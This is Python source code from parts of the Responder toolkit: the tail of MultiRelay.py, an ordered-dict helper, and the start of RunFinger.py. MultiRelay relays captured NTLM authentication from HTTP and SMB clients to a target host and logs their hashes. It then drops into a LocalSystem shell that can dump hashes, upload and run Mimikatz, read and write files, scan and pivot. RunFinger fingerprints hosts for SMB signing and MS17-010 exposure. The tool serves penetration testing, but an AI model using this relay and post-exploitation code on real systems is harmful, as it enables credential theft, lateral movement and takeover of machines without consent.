data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
if Username is not None:
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print("[+] SMB Session Auth sent.")
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
return None
else:
##Any other type of request, send a 407.
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
class HTTPRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
if IsPivotOn():
return None
except:
raise
try:
s = ConnectToTarget()
data = self.request.recv(8092)
##First we check if it's a Webdav OPTION request.
Webdav = ServeOPTIONS(data)
if Webdav:
#If it is, send the option answer, we'll send him to auth when we receive a profind.
self.request.send(NetworkSendBufferPython2or3(Webdav))
data = self.request.recv(4096)
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048) #got it here.
## Send HTTP Response.
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
if Username is not None:
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print("[+] SMB Session Auth sent.")
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
return None
else:
##Any other type of request, send a 401.
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
class SMBRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
except:
raise
try:
s = ConnectToTarget()
data = self.request.recv(8092)
##Negotiate proto answer. That's us.
if data[8:10] == b'\x72\x00':
Header = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x43\xc8", pid=pidcalc(data),mid=midcalc(data))
Body = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
packet1 = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(4096)
## Make sure it's not a Kerberos auth.
if data.find(b'NTLM') != -1:
## Start with nego protocol + session setup negotiate to our target.
data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting)
## Make sure it's not a Kerberos auth.
if data.find(b'NTLM') != -1:
##Relay all that to our client.
if data[8:10] == b'\x73\x00':
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
#NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange.
#Then simply grab the whole session setup packet except the smb header from the client and pass it to the server.
t = smbdata[36:].decode('latin-1')
packet0 = str(head)+str(t)
buffer0 = longueur(packet0)+packet0
self.request.send(NetworkSendBufferPython2or3(buffer0))
data = self.request.recv(4096)
else:
#if it's kerberos, ditch the connection.
s.close()
return None
if IsSMBAnonymous(NetworkSendBufferPython2or3(data)):
##Send logon failure for anonymous logins.
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
t = SMBSessEmpty()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
self.request.send(NetworkSendBufferPython2or3(buffer1))
s.close()
return None
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseSMBHash(data,self.client_address[0],challenge,UserToRelay,Host[0],Pivoting)
if Username is not None:
##Got the ntlm message 3, send it over to SMB.
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34].decode('latin-1'),mid="\x03\x00")
t = data[36:].decode('latin-1')#Final relay.
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
if Pivoting[0] == "1":
pass
else:
print("[+] SMB Session Auth sent.")
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(4096)
#We're all set, dropping into shell.
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
#If runcmd is None it's because tree connect was denied for this user.
#This will only happen once with that specific user account.
#Let's kill that connection so we can force him to reauth with another account.
if RunCmd is None:
s.close()
return None
else:
##Send logon failure, so our client might authenticate with another account.
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
t = SMBSessEmpty()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(4096)
self.request.close()
return None
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
#Interface starts here.
def RunShellCmd(data, s, clientIP, Target, Username, Domain):
#Let's declare our globals here..
#Pivoting gets used when the pivot cmd is used, it let us figure out in which mode is MultiRelay. Initial Relay or Pivot mode.
global Pivoting
#Update Host, when pivoting is used.
global Host
#Make sure we don't open 2 shell at the same time..
global ShellOpen
ShellOpen = ["Shell is open"]
# On this block we do some verifications before dropping the user into the shell.
if data[8:10] == b'\x73\x6d':
print("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.")
print("[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == b'\x73\x8d':
print("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == b'\x73\x5e':
print("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n")
del ShellOpen[:]
return False
## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$:
## Tree Connect
if data[8:10] == b'\x73\x00':
GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x43\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## Nope he doesn't.
if data[8:10] == b'\x75\x22':
if Pivoting[0] == "1":
pass
else:
print("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
# This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
if data[8:10] == b'\x75\xcc':
print("[+] Tree Connect AndX denied. Bad Network Name returned.")
del ShellOpen[:]
return False
## Tree Connect on C$ is successfull.
if data[8:10] == b'\x75\x00':
if Pivoting[0] == "1":
pass
else:
print("[+] Looks good, "+Username+" has admin rights on C$.")
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## Run one command.
if data[8:10] == b'\x75\x00' and OneCommand != None or Dump:
print("[+] Authenticated.")
if OneCommand != None:
print("[+] Running command: %s"%(OneCommand))
RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
if Dump:
print("[+] Dumping hashes")
DumpHashes(data, s, Target[0])
os._exit(1)
## Drop into the shell.
if data[8:10] == b'\x75\x00' and OneCommand == None:
if Pivoting[0] == "1":
pass
else:
print("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n")
ShowHelp()
Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
print(color('Connected to %s as LocalSystem.'%(Target[0]),2,1))
while True:
## We either just arrived here or we're back from a command operation, let's setup some stuff.
if data[8:10] == b'\x75\x00':
#start a thread for raw_input, so we can do other stuff while we wait for a command.
t = Thread(target=get_command, args=())
t.daemon = True
t.start()
#Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation
#to maintain MultiRelay alive and well.
count = 0
DoEvery = random.randint(10, 45)
while any(x in Cmd for x in Cmd) is False:
count = count+1
SMBKeepAlive(s, data)
if count == DoEvery:
DumbSMBChain(data, s, Target[0])
count = 0
if any(x in Cmd for x in Cmd) is True:
break
##Grab the commands. Cmd is global in get_command().
DumpReg = re.findall('^dump', Cmd[0])
Read = re.findall('^read (.*)$', Cmd[0])
RegDump = re.findall('^regdump (.*)$', Cmd[0])
Get = re.findall('^get (.*)$', Cmd[0])
Upload = re.findall('^upload (.*)$', Cmd[0])
Delete = re.findall('^delete (.*)$', Cmd[0])
RunAs = re.findall('^runas (.*)$', Cmd[0])
LCmd = re.findall('^lcmd (.*)$', Cmd[0])
Mimi = re.findall('^mimi (.*)$', Cmd[0])
Mimi32 = re.findall('^mimi32 (.*)$', Cmd[0])
Scan = re.findall('^scan (.*)$', Cmd[0])
Pivot = re.findall('^pivot (.*)$', Cmd[0])
Help = re.findall('^help', Cmd[0])
if Cmd[0] == "exit":
print("[+] Returning in relay mode.")
del Cmd[:]
del ShellOpen[:]
return None
##For all of the following commands we send the data (var: data) returned by the
##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore.
##We also clean up the command array when done.
if DumpReg:
data = DumpHashes(data, s, Target[0])
del Cmd[:]
if Read:
File = Read[0]
data = ReadFile(data, s, File, Target[0])
del Cmd[:]
if Get:
File = Get[0]
data = GetAfFile(data, s, File, Target[0])
del Cmd[:]
if Upload:
File = Upload[0]
if os.path.isfile(File):
FileSize, FileContent = UploadContent(File)
File = os.path.basename(File)
data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
del Cmd[:]
else:
print(File+" does not exist, please specify a valid file.")
del Cmd[:]
if Delete:
Filename = Delete[0]
data = DeleteFile(data, s, Filename, Target[0])
del Cmd[:]
if RegDump:
Key = RegDump[0]
data = SaveAKey(data, s, Target[0], Key)
del Cmd[:]
if RunAs:
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = RunAs[0]
data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
del Cmd[:]
else:
print(RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if LCmd:
subprocess.call(LCmd[0], shell=True)
del Cmd[:]
if Mimi:
if os.path.isfile(MimikatzFilename):
FileSize, FileContent = UploadContent(MimikatzFilename)
FileName = os.path.basename(MimikatzFilename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = Mimi[0]
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print(MimikatzFilename+" does not exist, please specify a valid file.")
del Cmd[:]
if Mimi32:
if os.path.isfile(Mimikatzx86Filename):
FileSize, FileContent = UploadContent(Mimikatzx86Filename)
FileName = os.path.basename(Mimikatzx86Filename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = Mimi32[0]
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print(Mimikatzx86Filename+" does not exist, please specify a valid file.")
del Cmd[:]
if Pivot:
if Pivot[0] == Target[0]:
print("[Pivot Verification Failed]: You're already on this host. No need to pivot.")
del Pivot[:]
del Cmd[:]
else:
if ShowSigning(Pivot[0]):
del Pivot[:]
del Cmd[:]
else:
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
RunAsPath = '%windir%\\Temp\\'+FileName
Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
if Status == True:
print("[+] Pivoting to %s."%(Pivot[0]))
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
#shell will close.
del ShellOpen[:]
#update the new host.
Host = [Pivot[0]]
#we're in pivoting mode.
Pivoting = ["1"]
data = PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Target[0], RunAsPath, FileName)
del Cmd[:]
s.close()
return None
if Status == False:
print("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.")
del Cmd[:]
del Pivot[:]
else:
print(RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if Scan:
LocalIp = FindLocalIp()
Range = ConvertToClassC(Target[0], Scan[0])
RunPivotScan(Range, Target[0])
del Cmd[:]
if Help:
ShowHelp()
del Cmd[:]
##Let go with the command.
if any(x in Cmd for x in Cmd):
if len(Cmd[0]) > 1:
if os.path.isfile(SysSVCFileName):
FileSize, FileContent = UploadContent(SysSVCFileName)
FileName = os.path.basename(SysSVCFileName)
RunPath = '%windir%\\Temp\\'+FileName
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
del Cmd[:]
else:
print(SysSVCFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if isinstance(data, str):
data = data.encode('latin-1')
if data is None:
print("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
if data[8:10] == b"\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
class ThreadingTCPServer(TCPServer):
def server_bind(self):
TCPServer.server_bind(self)
ThreadingTCPServer.allow_reuse_address = 1
ThreadingTCPServer.daemon_threads = True
def serve_thread_tcp(host, port, handler):
try:
server = ThreadingTCPServer((host, port), handler)
server.serve_forever()
except:
print(color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
def main():
try:
threads = []
threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,)))
if ExtraPort != 0:
threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,)))
for thread in threads:
thread.setDaemon(True)
thread.start()
while True:
time.sleep(1)
except (KeyboardInterrupt, SystemExit):
##If we reached here after a MultiRelay shell interaction, we need to reset the terminal to its default.
##This is a bug in python readline when dealing with raw_input()..
if ShellOpen:
os.system('stty sane')
##Then exit
sys.exit("\rExiting...")
if __name__ == '__main__':
main()

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build/lib/Responder/tools/MultiRelay/RelayMultiCore.py
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build/lib/Responder/tools/MultiRelay/RelayMultiPackets.py
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0
build/lib/Responder/tools/MultiRelay/__init__.py
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124
build/lib/Responder/tools/MultiRelay/odict.py
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import sys
try:
from UserDict import DictMixin
except ImportError:
from collections import UserDict
try:
from collections import MutableMapping as DictMixin
except ImportError:
from collections.abc import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end]
self.__map = {}
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = next(reversed(self))
else:
key = next(iter(self))
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
if sys.version_info >= (3, 0):
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.keys
itervalues = DictMixin.values
iteritems = DictMixin.items
else:
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self.items()))
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
min(p==q for p, q in zip(list(self.items()), list(other.items())))
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
if __name__ == '__main__':
d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)])
assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh']

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build/lib/Responder/tools/RunFinger.py
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@ -1,470 +0,0 @@
#!/usr/bin/env python3
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re,sys,struct
import datetime
import multiprocessing
import os
import errno
import optparse
import sqlite3
from RunFingerPackets import *
from Responder.odict import OrderedDict
from socket import *
from Responder.odict import OrderedDict
__version__ = "1.8"
parser = optparse.OptionParser(usage='python %prog -i 10.10.10.224\nor:\npython %prog -i 10.10.10.0/24', version=__version__, prog=sys.argv[0])
parser.add_option('-i','--ip', action="store", help="Target IP address or class C", dest="TARGET", metavar="10.10.10.224", default=None)
parser.add_option('-f','--filename', action="store", help="Target file", dest="Filename", metavar="ips.txt", default=None)
parser.add_option('-t','--timeout', action="store", help="Timeout for all connections. Use this option to fine tune Runfinger.", dest="Timeout", type="float", metavar="0.9", default=2)
options, args = parser.parse_args()
if options.TARGET == None and options.Filename == None:
print("\n-i Mandatory option is missing, please provide a target or target range.\n")
parser.print_help()
exit(-1)
Timeout = options.Timeout
Host = options.TARGET
Filename = options.Filename
SMB1 = "True"
SMB2signing = "False"
DB = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/RunFinger.db"
class Packet():
fields = OrderedDict([
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in list(kw.items()):
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, list(self.fields.values())))
#Python version
if (sys.version_info > (3, 0)):
PY2OR3 = "PY3"
else:
PY2OR3 = "PY2"
if not os.path.exists(DB):
cursor = sqlite3.connect(DB)
cursor.execute('CREATE TABLE RunFinger (timestamp TEXT, Protocol TEXT, Host TEXT, WindowsVersion TEXT, OsVer TEXT, DomainJoined TEXT, Bootime TEXT, Signing TEXT, NullSess TEXT, IsRDPOn TEXT, SMB1 TEXT, MSSQL TEXT)')
cursor.commit()
cursor.close()
def StructWithLenPython2or3(endian,data):
#Python2...
if PY2OR3 == "PY2":
return struct.pack(endian, data)
#Python3...
else:
return struct.pack(endian, data).decode('latin-1')
def NetworkSendBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return bytes(str(data), 'latin-1')
def NetworkRecvBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return str(data.decode('latin-1'))
def longueur(payload):
length = StructWithLenPython2or3(">i", len(''.join(payload)))
return length
def ParseNegotiateSMB2Ans(data):
if data[4:8] == b"\xfeSMB":
return True
else:
return False
def SMB2SigningMandatory(data):
global SMB2signing
if data[70:71] == "\x03":
SMB2signing = "True"
else:
SMB2signing = "False"
def WorkstationFingerPrint(data):
return {
b"\x04\x00" :"Windows 95",
b"\x04\x0A" :"Windows 98",
b"\x04\x5A" :"Windows ME",
b"\x05\x00" :"Windows 2000",
b"\x05\x01" :"Windows XP",
b"\x05\x02" :"Windows XP(64-Bit)/Windows 2003",
b"\x06\x00" :"Windows Vista/Server 2008",
b"\x06\x01" :"Windows 7/Server 2008R2",
b"\x06\x02" :"Windows 8/Server 2012",
b"\x06\x03" :"Windows 8.1/Server 2012R2",
b"\x0A\x00" :"Windows 10/Server 2016/2022 (check build)",
}.get(data, 'Other than Microsoft')
def GetOsBuildNumber(data):
ProductBuild = struct.unpack("<h",data)[0]
return ProductBuild
def SaveRunFingerToDb(result):
for k in [ 'Protocol', 'Host', 'WindowsVersion', 'OsVer', 'DomainJoined', 'Bootime', 'Signing','NullSess', 'IsRPDOn', 'SMB1','MSSQL']:
if not k in result:
result[k] = ''
cursor = sqlite3.connect(DB)
cursor.text_factory = sqlite3.Binary
res = cursor.execute("SELECT COUNT(*) AS count FROM RunFinger WHERE Protocol=? AND Host=? AND WindowsVersion=? AND OsVer=? AND DomainJoined=? AND Bootime=? AND Signing=? AND NullSess=? AND IsRDPOn=? AND SMB1=? AND MSSQL=?", (result['Protocol'], result['Host'], result['WindowsVersion'], result['OsVer'], result['DomainJoined'], result['Bootime'], result['Signing'], result['NullSess'], result['IsRDPOn'], result['SMB1'], result['MSSQL']))
(count,) = res.fetchone()
if not count:
cursor.execute("INSERT INTO RunFinger VALUES(datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?, ?,?,?)", (result['Protocol'], result['Host'], result['WindowsVersion'], result['OsVer'], result['DomainJoined'], result['Bootime'], result['Signing'], result['NullSess'], result['IsRDPOn'], result['SMB1'], result['MSSQL']))
cursor.commit()
cursor.close()
def ParseSMBNTLM2Exchange(data, host, bootime, signing): #Parse SMB NTLMSSP Response
data = data.encode('latin-1')
SSPIStart = data.find(b'NTLMSSP')
SSPIString = data[SSPIStart:]
TargetNameLen = struct.unpack('<H',data[SSPIStart+12:SSPIStart+14])[0]
TargetNameOffset = struct.unpack('<L',data[SSPIStart+16:SSPIStart+20])[0]
Domain = SSPIString[TargetNameOffset:TargetNameOffset+TargetNameLen].decode('UTF-16LE')
AvPairsLen = struct.unpack('<H',data[SSPIStart+40:SSPIStart+42])[0]
AvPairsOffset = struct.unpack('<L',data[SSPIStart+44:SSPIStart+48])[0]
#AvPairs = SSPIString[AvPairsOffset:AvPairsOffset+AvPairsLen].decode('UTF-16LE')
WindowsVers = WorkstationFingerPrint(data[SSPIStart+48:SSPIStart+50])
WindowsBuildVers = GetOsBuildNumber(data[SSPIStart+50:SSPIStart+52])
DomainGrab((host, 445))
RDP = IsServiceOn((host,3389))
SQL = IsServiceOn((host,1433))
print(("[SMB2]:['{}', Os:'{}', Build:'{}', Domain:'{}', Bootime: '{}', Signing:'{}', RDP:'{}', SMB1:'{}', MSSQL:'{}']".format(host, WindowsVers, str(WindowsBuildVers), Domain, Bootime, signing, RDP,SMB1, SQL)))
SaveRunFingerToDb({
'Protocol': '[SMB2]',
'Host': host,
'WindowsVersion': WindowsVers,
'OsVer': str(WindowsBuildVers),
'DomainJoined': Domain,
'Bootime': Bootime,
'Signing': signing,
'NullSess': 'N/A',
'IsRDPOn':RDP,
'SMB1': SMB1,
'MSSQL': SQL
})
def GetBootTime(data):
data = data.encode('latin-1')
Filetime = int(struct.unpack('<q',data)[0])
if Filetime == 0: # server may not disclose this info
return 0, "Unknown"
t = divmod(Filetime - 116444736000000000, 10000000)
time = datetime.datetime.fromtimestamp(t[0])
return time, time.strftime('%Y-%m-%d %H:%M:%S')
def IsDCVuln(t, host):
if t[0] == 0:
return ("Unknown")
Date = datetime.datetime(2014, 11, 17, 0, 30)
if t[0] < Date:
return("This system may be vulnerable to MS14-068")
Date = datetime.datetime(2017, 3, 14, 0, 30)
if t[0] < Date:
return("This system may be vulnerable to MS17-010")
return(t[1])
#####################
def IsSigningEnabled(data):
if data[39:40] == "\x0f":
return 'True'
else:
return 'False'
def atod(a):
return struct.unpack("!L",inet_aton(a))[0]
def dtoa(d):
return inet_ntoa(struct.pack("!L", d))
def OsNameClientVersion(data):
try:
if PY2OR3 == "PY3":
length = struct.unpack('<H',data[43:45].encode('latin-1'))[0]
else:
length = struct.unpack('<H',data[43:45])[0]
if length > 255:
OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
if length <= 255:
OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[46+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def GetHostnameAndDomainName(data):
try:
data = NetworkRecvBufferPython2or3(data)
DomainJoined, Hostname = tuple([e.replace("\x00", "") for e in data[81:].split('\x00\x00\x00')[:2]])
#If max length domain name, there won't be a \x00\x00\x00 delineator to split on
if Hostname == '':
DomainJoined = data[81:110].decode('latin-1')
Hostname = data[113:].decode('latin-1')
return Hostname, DomainJoined
except:
return "Could not get Hostname.", "Could not get Domain joined"
def DomainGrab(Host):
global SMB1
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(Timeout)
try:
s.connect(Host)
h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
